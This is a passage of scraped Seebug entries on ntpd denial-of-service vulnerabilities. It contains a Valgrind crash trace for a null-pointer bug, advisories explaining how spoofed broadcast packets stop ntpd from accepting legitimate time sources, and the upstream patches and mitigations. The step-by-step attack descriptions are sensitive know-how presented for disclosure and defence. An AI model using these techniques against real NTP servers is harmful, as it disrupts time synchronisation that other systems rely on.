|\r\n| ==5389== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info |\r\n| ==5389== Command: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |\r\n| ==5389== |\r\n| 25 Jun 23:07:05 ntpd[5389]: ntpd 4.2.8p8@1.3265-o Sat Jun 25 20:50:30 UTC 2016 (1): Starting |\r\n| 25 Jun 23:07:05 ntpd[5389]: Command line: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |\r\n| 25 Jun 23:07:06 ntpd[5389]: proto: precision = 3.605 usec (-18) |\r\n| 25 Jun 23:07:06 ntpd[5389]: switching logging to file /dev/null |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 0 ^6wildcard [::]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 1 v4wildcard 0.0.0.0:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 2 lo 127.0.0.1:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 3 eth0 10.0.1.11:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 4 eth0:0 1.2.3.4:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 5 eth9:0 11.11.11.11:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 6 lo [::1]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 7 eth0 [fe80::f2de:f1ff:fe85:75cf%2]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 8 eth9 [fe80::a450:8eff:fecc:9c4%3]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listening on routing socket on fd #25 for interface updates |\r\n| ==5389== Invalid read of size 1 |\r\n| ==5389== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) |\r\n| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |\r\n| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |\r\n| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |\r\n| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |\r\n| ==5389== by 0x405A58: main (ntpd.c:392) |\r\n| ==5389== Address 0x0 is not stack'd, malloc'd or (recently) free'd |\r\n| ==5389== |\r\n| ==5389== |\r\n| ==5389== Process terminating with default action of signal 11 (SIGSEGV) |\r\n| ==5389== Access not within mapped region at address 0x0 |\r\n| ==5389== at 0x4C2C1A2: strlen 
(vg_replace_strmem.c:412) |\r\n| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |\r\n| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |\r\n| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |\r\n| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |\r\n| ==5389== by 0x405A58: main (ntpd.c:392) |\r\n| ==5389== If you believe this happened as a result of a stack |\r\n| ==5389== overflow in your program's main thread (unlikely but |\r\n| ==5389== possible), you can try to increase the size of the |\r\n| ==5389== main thread stack using the --main-stacksize= flag. |\r\n| ==5389== The main thread stack size used in this run was 204800. |\r\n| ==5389== |\r\n| ==5389== HEAP SUMMARY: |\r\n| ==5389== in use at exit: 122,458 bytes in 2,707 blocks |\r\n| ==5389== total heap usage: 2,875 allocs, 168 frees, 411,190 bytes allocated |\r\n| ==5389== |\r\n| ==5389== LEAK SUMMARY: |\r\n| ==5389== definitely lost: 0 bytes in 0 blocks |\r\n| ==5389== indirectly lost: 0 bytes in 0 blocks |\r\n| ==5389== possibly lost: 2,000 bytes in 2 blocks |\r\n| ==5389== still reachable: 120,458 bytes in 2,705 blocks |\r\n| ==5389== suppressed: 0 bytes in 0 blocks |\r\n| ==5389== Rerun with --leak-check=full to see details of leaked memory |\r\n| ==5389== |\r\n| ==5389== For counts of detected and suppressed errors, rerun with: -> |\r\n| ==5389== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) \r\n```\r\n\r\nntp.conf\r\n\r\n```\r\n| server 127.127.1.0 prefer |\r\n| fudge 127.127.1.0 stratum 10 |\r\n| driftfile /var/lib/ntp/drift |\r\n| broadcastdelay 0.008 |\r\n| |\r\n| logfile /dev/null |\r\n| |\r\n| restrict 127.0.0.1 mask 255.255.255.255 nomodify notrap |\r\n```", "published": "2016-11-23T00:00:00", "type": "seebug", "title": "ntpd remote pre-auth DoS (CVE-2016-7434)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7434"], "modified": "2016-11-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92551", "id": "SSV:92551", "sourceData": "", "cvss": {"score": 5.0, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:01:01", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the broadcast mode replay prevention functionality of ntpd. To prevent replay of broadcast mode packets, ntpd rejects broadcast mode packets with non-monotonically increasing transmit timestamps. Remote unauthenticated attackers can send specially crafted broadcast mode NTP packets to cause ntpd to reject all broadcast mode packets from legitimate NTP broadcast servers.\r\n\r\n### Tested Versions\r\nNTP 4.2.8p6\r\n\r\n### Product URLs\r\nhttp://www.ntp.org/\r\n\r\n### CVSS Scores\r\nCVSSv2: 5.0 - (AV:N/AC:L/Au:N/C:N/I:N/A:P)\r\nCVSSv3: 5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\r\n\r\n### Details\r\nIn response to the NTP Deja Vu vulnerability (CVE-2015-7973), ntp-4.2.8p6 introduced several new integrity checks on incoming broadcast mode packets. Upon receipt of a broadcast mode packet, before authentication is enforced, ntpd will reject the packet if any of the following conditions hold:\r\n\r\n1. The packet poll value is out of bounds for the broadcast association, i.e.\r\n```\r\n pkt->ppoll < peer->minpoll || pkt->ppoll > peer->maxpoll\r\n```\r\n2. The packet was received before a full poll interval has elapsed since the last broadcast packet was received from the packet's sender. i.e. A server cannot ingress packets more frequently than `peer->minpoll`.\r\n\r\n3. The packet transmit timestamp is less than the last seen broadcast packet transmit timestamp from the packet's sender. i.e. 
Broadcast packet transmit timestamps must be monotonically increasing.\r\n\r\nThe following logic is used to ensure that packet transmit timestamps are monotonically increasing:\r\n```\r\n/* ntp-4.2.8p6 ntpd/ntp_proto.c */\r\n1305 if (MODE_BROADCAST == hismode) {\r\n...\r\n1351 tdiff = p_xmt;\r\n1352 L_SUB(&tdiff, &peer->bxmt);\r\n1353 if (tdiff.l_i < 0) {\r\n1354 msyslog(LOG_INFO, \"receive: broadcast packet from %s contains non-monotonic timestamp: %#010x.%08x -> %#010x.%08x\",\r\n1355 stoa(&rbufp->recv_srcadr),\r\n1356 peer->bxmt.l_ui, peer->bxmt.l_uf,\r\n1357 p_xmt.l_ui, p_xmt.l_uf\r\n1358 );\r\n1359 ++bail;\r\n1360 }\r\n1361\r\n1362 peer->bxmt = p_xmt;\r\n1363\r\n1364 if (bail) {\r\n1365 peer->timelastrec = current_time;\r\n1366 sys_declined++;\r\n1367 return;\r\n1368 }\r\n1369 }\r\n```\r\n\r\nIf the packet transmit timestamp is less than the transmit timestamp on the last received broadcast packet from this association (`p_xmt - peer->bxmt < 0`), the packet will be discarded.\r\n\r\nUnfortunately, line 1362 updates the saved transmit timestamp for the alleged sender of the packet (`peer->bxmt`) before the packet is discarded. The update takes place even if the packet is unauthenticated and fails the previous integrity checks.\r\n\r\nThis leads to a trivial denial of service attack. The attacker:\r\n\r\n1. Discovers the IP address of the victim's broadcast server. e.g. Send the victim a client mode NTP packet and discover the broadcast server from the refid field of the victim's reply.\r\n2. Every poll period, send the victim a spoofed broadcast mode packet from the broadcast server with a transmit timestamp in the future. This will move `peer->bxmt` forward so that any legitimate packet will be rejected by the non-monotonic timestamp check.\r\n\t* The attacker does not need to be on the same subnet as the victim. 
The attacker can address the spoofed broadcast NTP packet directly to the victim's IP address.\r\n\t* The attacker can choose any reasonably small estimate for the poll period. Because the `peer->bxmt` update happens even when a packet fails the poll period checks, there is no penalty for sending packets too frequently.\r\n\r\nTo prevent this vulnerability, `peer->bxmt` should only be updated when a packet authenticates correctly. This is the approach taken in the patch below.\r\n\r\n### Mitigation\r\nThere is no workaround for this issue. Because the vulnerable logic is executed before authentication is enforced, authentication and the `restrict notrust` ntpd.conf directive have no effect. An attacker can bypass `notrust` restrictions by sending incorrectly authenticated packets.\r\n\r\nIn order to succeed in an attack, the attacker must send at least one spoofed packet per poll period. Therefore observing more than one NTP broadcast packet from the same sender address per poll period indicates a possible attack.\r\n\r\nThe following patch can be used to fix this vulnerability:\r\n```\r\nFrom 097fd4dae9ac4927d7cfa8011fd42f704bd02c45 Mon Sep 17 00:00:00 2001\r\nFrom: Matthew Van Gundy <mvangund@cisco.com>\r\nDate: Tue, 26 Jan 2016 15:00:28 -0500\r\nSubject: [PATCH] Fix unauthenticated broadcast mode denial of service (peer->bxmt)\r\n\r\n---\r\n include/ntp_fp.h | 1 +\r\n ntpd/ntp_proto.c | 22 ++++++++++++++++------\r\n 2 files changed, 17 insertions(+), 6 deletions(-)\r\n\r\ndiff --git a/include/ntp_fp.h b/include/ntp_fp.h\r\nindex 7806932..ad7a01d 100644\r\n--- a/include/ntp_fp.h\r\n+++ b/include/ntp_fp.h\r\n@@ -242,6 +242,7 @@ typedef u_int32 u_fp;\r\n #define L_ISGTU(a, b) M_ISGTU((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n #define L_ISHIS(a, b) M_ISHIS((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n #define L_ISGEQ(a, b) M_ISGEQ((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n+#define L_ISGEQU(a, b) L_ISHIS(a, b)\r\n #define L_ISEQU(a, b) M_ISEQU((a)->l_ui, 
(a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n\r\n /*\r\ndiff --git a/ntpd/ntp_proto.c b/ntpd/ntp_proto.c\r\nindex ad45409..ac469ce 100644\r\n--- a/ntpd/ntp_proto.c\r\n+++ b/ntpd/ntp_proto.c\r\n@@ -1305,7 +1305,6 @@ receive(\r\n if (MODE_BROADCAST == hismode) {\r\n u_char poll;\r\n int bail = 0;\r\n- l_fp tdiff;\r\n\r\n DPRINTF(2, (\"receive: PROCPKT/BROADCAST: prev pkt %ld seconds ago, ppoll: %d, %d secs\\n\",\r\n (current_time - peer->timelastrec),\r\n@@ -1348,9 +1347,8 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- tdiff = p_xmt;\r\n- L_SUB(&tdiff, &peer->bxmt);\r\n- if (tdiff.l_i < 0) {\r\n+ /* Use L_ISGEQU() to ensure unsigned comparison */\r\n+ if (!L_ISGEQU(&p_xmt, &peer->bxmt)) {\r\n msyslog(LOG_INFO, \"receive: broadcast packet from %s contains non-monotonic timestamp: %#010x.%08x -> %#010x.%08x\",\r\n stoa(&rbufp->recv_srcadr),\r\n peer->bxmt.l_ui, peer->bxmt.l_uf,\r\n@@ -1359,8 +1357,6 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- peer->bxmt = p_xmt;\r\n-\r\n if (bail) {\r\n peer->timelastrec = current_time;\r\n sys_declined++;\r\n@@ -1563,6 +1559,14 @@ receive(\r\n peer->xmt = p_xmt;\r\n\r\n /*\r\n+ * Now that we know the packet is correctly authenticated,\r\n+ * update peer->bxmt if needed\r\n+ */\r\n+ if (MODE_BROADCAST == hismode) {\r\n+ peer->bxmt = p_xmt;\r\n+ }\r\n+\r\n+ /*\r\n * Set the peer ppoll to the maximum of the packet ppoll and the\r\n * peer minpoll. 
If a kiss-o'-death, set the peer minpoll to\r\n * this maximum and advance the headway to give the sender some\r\n@@ -2400,6 +2404,7 @@ peer_clear(\r\n )\r\n {\r\n u_char u;\r\n+ l_fp bxmt = peer->bxmt;\r\n\r\n #ifdef AUTOKEY\r\n /*\r\n@@ -2436,6 +2441,11 @@ peer_clear(\r\n peer->flash = peer_unfit(peer);\r\n peer->jitter = LOGTOD(sys_precision);\r\n\r\n+ /* Don't throw away our broadcast replay protection */\r\n+ if (peer->hmode == MODE_BCLIENT) {\r\n+ peer->bxmt = bxmt;\r\n+ }\r\n+\r\n /*\r\n * If interleave mode, initialize the alternate origin switch.\r\n */\r\n```\r\n\r\n### Timeline\r\n* 2016-09-12 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Broadcast Mode Replay Prevention Denial of Service Vulnerability(CVE-2016-7427)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7973", "CVE-2016-7427"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96650", "id": "SSV:96650", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:15:04", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the broadcast mode poll interval enforcement functionality of ntpd. To limit abuse, ntpd restricts the rate at which each broadcast association will process incoming packets. ntpd will reject broadcast mode packets that arrive before the poll interval specified in the preceding broadcast packet expires. 
A vulnerability exists which allows remote unauthenticated attackers to send specially crafted broadcast mode NTP packets which will cause ntpd to reject all broadcast mode packets from legitimate NTP broadcast servers.\r\n\r\n### Tested Versions\r\nNTP 4.2.8p6\r\n\r\n### Product URLs\r\nhttp://www.ntp.org/\r\n\r\n### CVSS Scores\r\n* CVSSv2: 5.0 - (AV:N/AC:L/Au:N/C:N/I:N/A:P)\r\n* CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\r\n\r\n### Details\r\nIn response to the NTP Deja Vu vulnerability (CVE-2015-7973), ntp-4.2.8p6 introduced several new integrity checks on incoming broadcast mode packets. Upon receipt of a broadcast mode packet, before authentication is enforced, ntpd will reject the packet if any of the following conditions hold:\r\n\r\n1. The packet poll value is out of bounds for the broadcast association, i.e.\r\n```\r\n pkt->ppoll < peer->minpoll || pkt->ppoll > peer->maxpoll\r\n```\r\n \r\n2. The packet was received before a full poll interval has elapsed since the last broadcast packet was received from the packet's sender. i.e. A server cannot ingress packets more frequently than `peer->minpoll`.\r\n3. The packet transmit timestamp is less than the last seen broadcast packet transmit timestamp from the packet's sender. i.e. 
Broadcast packet transmit timestamps must be monotonically increasing.\r\n\r\nThe following logic is used to ensure constraint 2, which ensures that broadcast associations will process only one incoming packet per poll interval:\r\n```\r\n/* ntp-4.2.8p6 ntpd/ntp_proto.c */\r\n1305 if (MODE_BROADCAST == hismode) {\r\n...\r\n1341 if ( (current_time - peer->timelastrec)\r\n1342 < (1 << pkt->ppoll)) {\r\n1343 msyslog(LOG_INFO, \"receive: broadcast packet from %s arrived after %ld, not %d seconds!\",\r\n1344 stoa(&rbufp->recv_srcadr),\r\n1345 (current_time - peer->timelastrec),\r\n1346 (1 << pkt->ppoll)\r\n1347 );\r\n1348 ++bail;\r\n1349 }\r\n...\r\n1361\r\n1362 peer->bxmt = p_xmt;\r\n1363\r\n1364 if (bail) {\r\n1365 peer->timelastrec = current_time;\r\n1366 sys_declined++;\r\n1367 return;\r\n1368 }\r\n1369 }\r\n```\r\n\r\nIf the time elapsed since the last broadcast packet was received from this peer is less than the poll interval declared by the sender (`(current_time - peer->timelastrec) < (1 << pkt->ppoll)`), the packet will be discarded. (A previous check ensures that `pkt->ppoll` is within acceptable bounds.)\r\n\r\nUnfortunately, line 1341 compares the current time against the last time any broadcast mode packet was received with a source IP address of the peer (`peer->timelastrec`). In contrast to `peer->timereceived`, which is updated only when a clean (correctly authenticated and passing integrity checks) packet is received, `peer->timelastrec` is updated by all incoming broadcast packets including spoofed and replayed packets.\r\n\r\nThis leads to a trivial denial of service attack. The attacker:\r\n1. Discovers the IP address of the victim's broadcast server. e.g. Send the victim a client mode NTP packet and discover the broadcast server from the refid field of the victim's reply.\r\n2. At least once per poll period, send the victim a spoofed broadcast mode packet from the broadcast server. 
This will set `peer->timelastrec = current_time` such that, when a legitimate packet is received, it will appear to have been received too early (`(current_time - peer->timelastrec) < (1 << pkt->ppoll)`) and will be discarded.\r\n\t* The attacker does not need to be on the same subnet as the victim. The attacker can address the spoofed broadcast NTP packet directly to the victim's IP address.\r\n\t* The attacker can choose any reasonably small estimate for the poll period. Because the `peer->timelastrec` update happens even when a packet fails the poll period check, there is no penalty for sending packets too frequently.\r\n\r\n\r\nTo prevent this vulnerability, ntpd should only discard broadcast packets when less than one poll interval has elapsed since the last legitimate packet has been received (`peer->timereceived`).\r\n\r\n### Mitigation\r\nThere is no workaround for this issue. Because the vulnerable logic is executed before authentication is enforced, authentication and the `restrict notrust` ntpd.conf directive have no effect. An attacker can bypass `notrust` restrictions by sending incorrectly authenticated packets.\r\n\r\nIn order to succeed in an attack, the attacker must send at least one spoofed packet per poll period. Therefore observing more than one NTP broadcast packet from the same sender address per poll period indicates a possible attack.\r\n\r\nThe following patch can be used to fix this vulnerability:\r\n```\r\nFrom 8522882496d3df2bd764de6d8f7afac4a8d84006 Mon Sep 17 00:00:00 2001\r\nFrom: Matthew Van Gundy <mvangund@cisco.com>\r\nDate: Fri, 5 Feb 2016 17:38:32 -0500\r\nSubject: [PATCH] Fix unauthenticated broadcast mode denial of service (peer->timelastrec)\r\n\r\nDrop packets if they arrive less than one poll interval since the last\r\n**clean** packet received on an association. 
If we compare against the\r\nlast time that *any* packet was received, even one that will be dropped\r\nfor failing integrity checks, an attacker can DoS the association by\r\nsending incorrectly authenticated packets or replaying old packets to\r\nkeep bumping the peer->timelastrec timer forward.\r\n---\r\n include/ntp.h | 4 +++-\r\n ntpd/ntp_proto.c | 13 +++++++++++--\r\n 2 files changed, 14 insertions(+), 3 deletions(-)\r\n\r\ndiff --git a/include/ntp.h b/include/ntp.h\r\nindex 6a4e9aa..cbf6cec 100644\r\n--- a/include/ntp.h\r\n+++ b/include/ntp.h\r\n@@ -383,7 +383,9 @@ struct peer {\r\n * Statistic counters\r\n */\r\n u_long timereset; /* time stat counters were reset */\r\n- u_long timelastrec; /* last packet received time */\r\n+ u_long timelastrec; /* last packet received time (may\r\n+ * include spoofed, replayed, or other\r\n+ * invalid packets) */\r\n u_long timereceived; /* last (clean) packet received time */\r\n u_long timereachable; /* last reachable/unreachable time */\r\n\r\ndiff --git a/ntpd/ntp_proto.c b/ntpd/ntp_proto.c\r\nindex ad45409..1ea5cee 100644\r\n--- a/ntpd/ntp_proto.c\r\n+++ b/ntpd/ntp_proto.c\r\n@@ -1338,11 +1338,20 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- if ( (current_time - peer->timelastrec)\r\n+ /*\r\n+ * Ensure that at least one poll interval has\r\n+ * elapsed since the last **clean** packet was\r\n+ * received. 
We limit the check to **clean**\r\n+ * packets to prevent replayed packets and\r\n+ * incorrectly authenticated packets, which\r\n+ * we'll discard, from being used to create a\r\n+ * denial of service condition.\r\n+ */\r\n+ if ( (current_time - peer->timereceived)\r\n < (1 << pkt->ppoll)) {\r\n msyslog(LOG_INFO, \"receive: broadcast packet from %s arrived after %ld, not %d seconds!\",\r\n stoa(&rbufp->recv_srcadr),\r\n- (current_time - peer->timelastrec),\r\n+ (current_time - peer->timereceived),\r\n (1 << pkt->ppoll)\r\n );\r\n ++bail;\r\n--\r\n2.5.2\r\n```\r\n\r\n### Timeline\r\n* 2016-09-12 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Broadcast Mode Poll Interval Enforcement Denial of Service Vulnerability(CVE-2016-7428)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7973", "CVE-2016-7428"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96648", "id": "SSV:96648", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T11:56:52", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the trap functionality of ntpd. If an ntpd instance is configured to send traps, a specially crafted network packet can be used to cause a null pointer dereference resulting in a denial of service. This vulnerability can be triggered by a remote unauthenticated attacker.\r\n\r\n### Tested Versions\r\n* NTP 4.2.8p8\r\n* NTPsec 0.9.3\r\n\r\n### Product URLs\r\n* http://www.ntp.org\r\n* http://www.ntpsec.org/\r\n\r\n### CVSS Scores\r\nCVSSv2: 7.1 - (AV:N/AC:M/Au:N/C:N/I:N/A:C)\r\nCVSSv3: 5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### Details\r\nWhen reporting traps, the ntpd report_event(err, peer, str) function asserts that peer != NULL if err is a \"peer event\". 
Thus if report_event() can be called with a NULL peer parameter, ntpd will abort(), causing a DoS condition.\r\n\r\nntp-4.2.8p7 introduced a variety of validity checks on crypto-NAK packets to address the nak-dos vulnerability (CVE-2016-1547). When any of these validity checks fail, ntpd reports an event to any trap receivers with: report_event(PEVNT_AUTH, peer, \"Invalid_NAK\").\r\n\r\nIf the source address and mode of the incoming crypto-NAK packet do not correspond to an existing peer, the peer argument will be NULL, causing the INSIST(peer != NULL) assertion to fail when report_event() attempts to report the event to its trap recipients.\r\n\r\nIt may also be possible to trigger reporting of a peer event without a valid peer on other code paths. For example, check_leapsec() in ntp_timer.c calls:\r\n```\r\nreport_event(PEVNT_ARMED, sys_peer, NULL);\r\n```\r\n\r\nIf ntpd's sys_peer advertises a leap second and then the host running ntpd becomes temporarily disconnected, it may be possible for check_leapsec() to be called without a valid sys_peer, leading to the assertion failure above.\r\n\r\nThis crash can be reliably triggered on ntp-4.2.8p8. We are reporting this defect against NTPsec 0.9.3 as well because it contains the same incorrect logic in report_event(). However, we did not attempt to exploit this vulnerability on NTPsec because triggering a call to report_event() with a NULL peer is not as straightforward as with ntp-4.2.8p8.\r\n\r\nThe fix for CRYPTO_NAK crash (CVE-2016-4957) introduced in ntp-4.2.8p8 does not address this vulnerability.\r\n\r\nThough traps are not configured in most common NTP environments, attackers can employ \"Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability\" (TALOS-2016-0203) to configure a trap and then exploit this vulnerability.\r\n\r\n### Mitigation\r\nSuccessful exploitation of this vulnerability requires ntpd to be configured with trap recipients. 
Systems can be protected by removing all \"trap\" commands from ntp.conf and adopting the mitigations for \"Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability\" (TALOS-2016-0203).\r\n\r\n### Timeline\r\n* 2016-09-20 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Trap Crash Denial of Service Vulnerability(CVE-2016-9311)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1547", "CVE-2016-4957", "CVE-2016-9311"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96649", "id": "SSV:96649", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}